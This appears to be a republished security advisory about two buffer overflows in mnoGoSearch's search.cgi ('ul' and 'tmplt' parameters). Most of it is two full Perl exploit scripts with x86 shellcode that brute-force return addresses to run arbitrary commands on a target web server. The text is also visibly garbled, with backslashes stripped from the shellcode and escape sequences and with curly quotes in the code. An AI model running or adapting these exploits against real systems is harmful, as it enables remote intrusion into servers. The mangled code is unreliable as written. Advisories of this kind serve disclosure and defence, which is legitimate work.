‘mnoGoSearch Vulnerable to a Buffer Overflow Vulnerability (ul, tmplt)’

Summary

mnoGoSearch is a full-featured SQL based web search engine, two vulnerabilities in the product allow attackers to cause the product to overflow two of its internal buffers, causing the program to crash, possibly execute arbitrary code.’

Credit:

‘The information has been provided by pokleyzz.’


Details

Vulnerable systems:
 * mnoGoSearch version 3.1.20
 * mnoGoSearch version 3.2.10

Overflow in ‘ul’ parameter:
The ‘ul’ variable is used to specify search result to specific URL. By supplying crafted ‘ul’ variable more than 5000 user can write arbitrary address and run command as web server user.

Example:
http://blablabla.com/cgi-bin/search.cgi?ul=[6000]A`s

Overflow in ‘tmplt’ parameter:
User can crash search.cgi by supplying ‘tmplt’ variable over 1024 character. This is stack based buffer overflow where the EIP is easily overwritten.

Example:
http://blablabla.com/cgi-bin/search.cgi?tmplt=[1050]A`s

Vendor response:
Vendor has been contacted on 01/06/2003 and fix is available from CVS at http://www.mnogosearch.org.

Exploits:
Exploit for ul overflow:
#!/usr/bin/perl
#
# [ reloaded ]
# mencari_sebuah_nama.pl v2.0
# mnogosearch 3.1.x (http://www.mnogosearch.org) exploit for linux ix86
# by pokleyzz of d’scan clanz (05-2003)
#
# Greet:
# tynon, sk ,wanvadder, s0cket370, flyguy, sutan ,spoonfork, Schm|dt,
# kerengge_kurus, b0iler and d’scan clanz.
#
# Shout to:
# #mybsd, #mylinux, #vuln
#
# Special thanks:
# Skywizard of mybsd
#
# —————————————————————————-
# ‘TEH TARIK-WARE LICENSE’ (Revision 1):
# wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a ‘teh tarik’ in return.
# —————————————————————————-
# (Base on Poul-Henning Kamp Beerware)
#
#

use IO::Socket;

$host = ‘127.0.0.1’;
$cmd = ‘ls -la’;
$searchpath = ‘/cgi-bin/search.cgi’;
$rawret = 0xbfff105c;
$ret = ”;
$suffsize = 0;
$port = 80;

my $conn;

if ($ARGV[0]){
  $host = $ARGV[0];
}
else {
  print ‘[x] mnogosearch 3.1.x exploit for linux ix86 ntby pokleyzz of d’ scan clanznn’;
  print ‘Usage:n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]n’;
  print ‘thostthostname to exploitn’;
  print ‘tcommandtcommand to execute on servern’;
  print ‘tpathtpath to search.cgi default /cgi-bin/search.cgin’;
  print ‘tporttport to connect ton’;
  print ‘tsufftif not success try to use 1, 2 or 3 for suff (default is 0)n’;
  print ‘trettreturn address default bfffd0d0n’;
  exit;
}

if ($ARGV[1]){
  $cmd = $ARGV[1];
}
if ($ARGV[2]){
  $searchpath = $ARGV[2];
}
if ($ARGV[3]){
  $port = int($ARGV[3]);
}
if ($ARGV[4]){
  $suffsize = int($ARGV[4]);
}
if ($ARGV[5]){
  $rawret = hex_to_int($ARGV[5]);
}

#########~~ start function ~~#########
sub hex_to_int {
  my $hs = $_[0];
  $int = (hex(substr($hs, 0, 2)) << 24) + (hex(substr($hs, 2, 2)) << 16) + (hex(substr($hs, 4, 2)) << 8) + + hex(substr($hs, 6, 2));
     
}

sub int_to_hex {
  my $in = $_[0];
  $hex = sprintf ‘%x’,$in;
}

sub string_to_ret {
  my $rawret = $_[0];
  if (length($rawret) != 8){
    print $rawret;
    die ‘[*] incorrect return address …n ‘;
  } else {
    $ret = chr(hex(substr($rawret, 2, 2)));
    $ret .= chr(hex(substr($rawret, 0, 2)));
    $ret .= chr(hex(substr($rawret, 6, 2)));
        $ret .= chr(hex(substr($rawret, 4, 2)));
        
  }
  
}

sub connect_to {
  #print ‘[x] Connect to $host on port $port …n’;
  $conn = IO::Socket::INET->new (
          Proto => ‘tcp’,
          PeerAddr => ‘$host’,
          PeerPort => ‘$port’,
          ) or die ‘[*] Can’t connect to $host on port $port …n’;
  $conn-> autoflush(1);
}

sub check_version {
  my $result;
  connect_to();
  print ‘[x] Check if $host use correct version …n’;
  print $conn ‘GET $searchpath?tmplt=/test/testing123 HTTP/1.1nHost: $hostnConnection: Closenn’;
  
  # capture result
  while ($line = <$conn>) {
    $result .= $line;
    };
  
  close $conn;
  if ($result =~ /_test_/){
    print ‘[x] Correct version detected .. possibly vulnerable …n’;
  } else {
    print $result;
    die ‘[x] New version or wrong urln’;
  }
}

sub exploit {
  my $rw = $_[0];
  $result = ”;
  # linux ix86 shellcode rip from phx.c by proton
  $shellcode = ‘xebx3bx5ex8dx5ex10x89x1ex8dx7ex18x89x7ex04x8dx7ex1bx89x7ex08′
               .’xb8x40x40x40x40x47x8ax07x28xe0x75xf9x31xc0x88x07x89x46x0cx88′
               .’x46x17x88x46x1ax89xf1x8dx56x0cxb0x0bxcdx80x31xdbx89xd8x40xcd’
               .’x80xe8xc0xffxffxffx41x41x41x41x41x41x41x41x41x41x41x41x41x41′
               .’x41x41′
               .’/bin/sh -c echo ‘Content-Type: text/hello’;echo ”;’
               .’$cmd’
               .’@’;
  $strret = int_to_hex($rw);
  $ret = string_to_ret($strret);
  $envvar = ‘B’ x (4096 – length($shellcode));
  $envvar .= $shellcode;
  
  # generate query string
  $buffer = ‘B’ x $suffsize;
  $buffer .= ‘B’ x 4800;
  $buffer .= $ret x 200;
  
  $request = ‘GET $searchpath?ul=$buffer HTTP/1.1n’
       .’Accept: $envvarn’
       .’Accept-Language: $envvarn’
       .’Accept-Encoding: $envvarn’
       .’User-Agent: Mozilla/4.0n’
       .’Host: $hostn’
       .’Connection: Closenn’;
  
  &connect_to;
  print ‘[x] Sending exploit code ..n’;
  print ‘[x] ret: $strretn’;
  print ‘[x] suf: $suffsizen’;
  print ‘[x] length:’,length($request),’n’;
  print $conn ‘$request’;
  while ($line = <$conn>) {
    $result .= $line;
    };
  close $conn;
  
}

sub check_result {
  if ($result =~ /hello/ && !($result =~ /text/html/)){
    print $result;
    $success = 1;
  } else {
    print $result;
    print ‘[*] Failed …n’;
    $success = 0;
  }
}
#########~~ end function ~~#########

&check_version;
for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){
  &exploit($rawret);
  &check_result;
  if ($success == 1){
    exit;
  }
  sleep 1;
}

# generate shellcode

Exploit for tmplt overflow:
#!/usr/bin/perl
#
# mnogosearch 3.2.x exploit for linux ix86
# by pokleyzz and s0cket370 of d’scan clanz
#
# Greet:
# tynon, sk ,wanvadder, flyguy, sutan ,spoonfork, Schm|dt, kerengge_kurus and d’scan clan.
#
# Special thanks:
# Skywizard of mybsd
#
#
# —————————————————————————-
# ‘TEH TARIK-WARE LICENSE’ (Revision 1):
# wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a ‘teh tarik’ in return.
# —————————————————————————-
# (Base on Poul-Henning Kamp Beerware)
#

use IO::Socket;

my $host = ‘127.0.0.1’;
my $port = 80;
my $searchpath = ‘/cgi-bin/search.cgi’;
my $envsize = 4096;
my $suffsize = 3;
my $rawret = ‘bfffd666’;
my $ret;
my $cmd = ‘ls -l’;
my $conn;

if ($ARGV[0]){
  $host = $ARGV[0];
}
else {
  print ‘[x] mnogosearch 3.2.x exploit for linux ix86 ntby pokleyzz and s0cket370 of d’ scan clannn’;
  print ‘Usage: n mencari_asal_usul.pl hostname [command ] [path] [port] [suff] [ret]n’;
  print ‘t- if not success try to use 0,1 or 2 for suff (default is 3)’;
  exit;
}

if ($ARGV[1]){
  $cmd = $ARGV[1];
}
if ($ARGV[2]){
  $searchpath = $ARGV[2];
}
if ($ARGV[3]){
  $port = int($ARGV[3]);
}
if ($ARGV[4]){
  $suffsize = int($ARGV[4]);
}
if ($ARGV[5]){
  $rawret = $ARGV[5];
}

# linux ix86 shellcode rip from phx.c by proton
my $shellcode = ‘xebx3bx5ex8dx5ex10x89x1ex8dx7ex18x89x7ex04x8dx7ex1bx89x7ex08′
             .’xb8x40x40x40x40x47x8ax07x28xe0x75xf9x31xc0x88x07x89x46x0cx88′
             .’x46x17x88x46x1ax89xf1x8dx56x0cxb0x0bxcdx80x31xdbx89xd8x40xcd’
             .’x80xe8xc0xffxffxffx41x41x41x41x41x41x41x41x41x41x41x41x41x41′
             .’x41x41′
             .’/bin/sh -c echo ‘Content-Type: text/hello’;echo ”;’
             .’$cmd’
             .’@’;

sub string_to_ret {
  my $rawret = $_[0];
  if (length($rawret) != 8){
    print $rawret;
    die ‘[*] incorrect return address …n ‘;
  } else {
    $ret = chr(hex(substr($rawret, 6, 2)));
    $ret .= chr(hex(substr($rawret, 4, 2)));
    $ret .= chr(hex(substr($rawret, 2, 2)));
        $ret .= chr(hex(substr($rawret, 0, 2)));
        
  }
  
}

sub connect_to {
  print ‘[x] Connect to $host on port $port …n’;
  $conn = IO::Socket::INET->new (
          Proto => ‘tcp’,
          PeerAddr => ‘$host’,
          PeerPort => ‘$port’,
          ) or die ‘[*] Can’t connect to $host on port $port …n’;
  $conn-> autoflush(1);
}

sub check_version {
  my $result;
  connect_to();
  print ‘[x] Check if $host use correct version …n’;
  print $conn ‘GET $searchpath?tmplt=/test/testing123 HTTP/1.1nHost: $hostnn’;
  
  # capture result
  while ($line = <$conn>) {
    $result .= $line;
    };
  
  close $conn;
  if ($result =~ //test//){
    print ‘[x] Correct version.. possibly vulnerable …n’;
  } else {
    print $result;
    die ‘[x] Old version or wrong urln’;
  }
}

# start exploiting …
sub exploit {

  # generate environment variable for http request
  $envvar = ‘A’ x (4096 – length($shellcode));
  $envvar .= $shellcode;
  
  # generate query request
  $query = ‘A’ x $suffsize;
  $query .= $ret x 258;
  
  # generate request
  $request = ‘GET $searchpath?tmplt=$query HTTP/1.1n’
       .’Accept: $envvarn’
       .’Accept-Language: $envvarn’
       .’Accept-Encoding: $envvarn’
       .’User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)n’
       .’Host: $hostn’
       .’Connection: Closenn’;
  
  print ‘[x] Trying to execute command … n’;
  print ‘[x] Return address : $rawret n’;
  print ‘[x] Suffix size : $suffsize n’;
  connect_to();
  print $conn ‘$request’;
  
  # capture result
  while ($line = <$conn>) {
    $result .= $line;
    };
  close $conn;
  
  if ($result =~ /hello/){
    print $result;
  } else {
    print ‘[*] Failed …n’;
  }
}

&string_to_ret($rawret);
&check_version;
&exploit;’

Categories: News